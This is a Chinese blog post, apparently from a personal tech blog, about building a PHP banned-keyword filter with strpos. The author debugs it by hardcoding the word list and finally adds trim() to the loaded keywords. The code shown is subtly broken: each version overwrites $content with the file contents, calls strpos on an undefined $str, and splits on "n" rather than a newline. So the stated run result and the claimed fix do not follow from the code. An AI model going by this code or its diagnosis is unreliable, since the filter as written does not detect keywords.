/**  * PHP中用strpos函数过滤关键字  * 琼台博客  */ // 关键字过滤函数 function keyWordCheck($content){         // 去除空白     $content = trim($content);         // 读取关键字文本     $content = @file_get_contents('keyWords.txt');         // 转换成数组     $arr = explode("n", $content);         // 遍历检测     for($i=0,$k=count($arr);$i<$k;$i++){                 // 如果此数组元素为空则跳过此次循环         if($arr[$i]==''){               continue;            }                   // 如果检测到关键字，则返回匹配的关键字,并终止运行         if(@strpos($str,$arr[$i])!==false){             //$i=$k;                return $arr[$i];         }        }         // 如果没有检测到关键字则返回false        return false; }     $content = '这里是要发布的文本内容。。。';   // 过滤关键字 $keyWord =  keyWordCheck($content);   // 判断是否存在关键字 if($keyWord){         echo '你发布的内容存在关键字'.$keyWord; }else{         echo '恭喜！通过关键字检测';         // 往下可以进行写库操作完成发布动作。 }

写完代码后，故意在变量$content中写了一个关键字内容，然后运行发现没有检测到关键字，执行结果是通过，换成其它禁止的关键字都通过。
郁闷，开始判断是不是哪里出问题
编码问题？ 立即把keyWord.txt文件再次用记事本打开，然后另存为UTF-8格式。结果还是不行。
没有获取到keyWord.txt文本内容？ 立即 print_r() 发现正常读取并按行转成了数组。
于是，我把关键字数组直接声明写成死的在程序中

代码如下

复制代码

<?php /**  * PHP中用strpos函数过滤关键字  * 琼台博客  */ // 关键字过滤函数 function keyWordCheck($content){         // 去除空白     $content = trim($content);         // 读取关键字文本     //$content = @file_get_contents('keyWords.txt');         // 转换成数组     //$arr = explode("n", $content);         // 直接在程序中声明关键字数组         $arr = array('关键字1','关键字2','关键字3','关键字4'...);         // 遍历检测     for($i=0,$k=count($arr);$i<$k;$i++){                 // 如果此数组元素为空则跳过此次循环         if($arr[$i]==''){               continue;            }                   // 如果检测到关键字，则返回匹配的关键字,并终止运行         if(@strpos($str,$arr[$i])!==false){             //$i=$k;                return $arr[$i];         }        }         // 如果没有检测到关键字则返回false        return false; }   $content = '这里是要发布的内容，含有关键字2'; // 过滤关键字 $keyWord =  keyWordCheck($content);   // 判断是否存在关键字 if($keyWord){         echo '你发布的内容存在关键字【'.$keyWord.'】'; }else{         echo '恭喜！通过关键字检测';         // 往下可以进行写库操作完成发布动作。 } // 程序运行结果：你发布的内容存在关键字【关键字2】 // 程序正常

如果在PHP中声明关键字数组，就能起到作用，如果读取文本文件就无效，见鬼了？
正在百思不得其解之时，想到了会不会是从文本文件中读取的内容有空格或者换行符没有过滤所导致？于是在遍历匹配那里加了一个trim函数

加了trim()函数过滤空白后运行通过测试，原来瞎折腾了半天问题就在这里。

代码如下

复制代码

/**  * PHP中用strpos函数过滤关键字  * 琼台博客  */ // 关键字过滤函数 function keyWordCheck($content){         // 去除空白     $content = trim($content);         // 读取关键字文本     $content = @file_get_contents('keyWords.txt');         // 转换成数组     $arr = explode("n", $content);         // 遍历检测     for($i=0,$k=count($arr);$i<$k;$i++){                 // 如果此数组元素为空则跳过此次循环         if($arr[$i]==''){               continue;            }                   // 如果检测到关键字，则返回匹配的关键字,并终止运行                 // 这一次加了 trim()函数         if(@strpos($str,trim($arr[$i]))!==false){             //$i=$k;                return $arr[$i];         }        }         // 如果没有检测到关键字则返回false        return false; }     $content = '这里是要发布的文本内容。。。';   // 过滤关键字 $keyWord =  keyWordCheck($content);   // 判断是否存在关键字 if($keyWord){         echo '你发布的内容存在关键字'.$keyWord; }else{         echo '恭喜！通过关键字检测';         // 往下可以进行写库操作完成发布动作。 }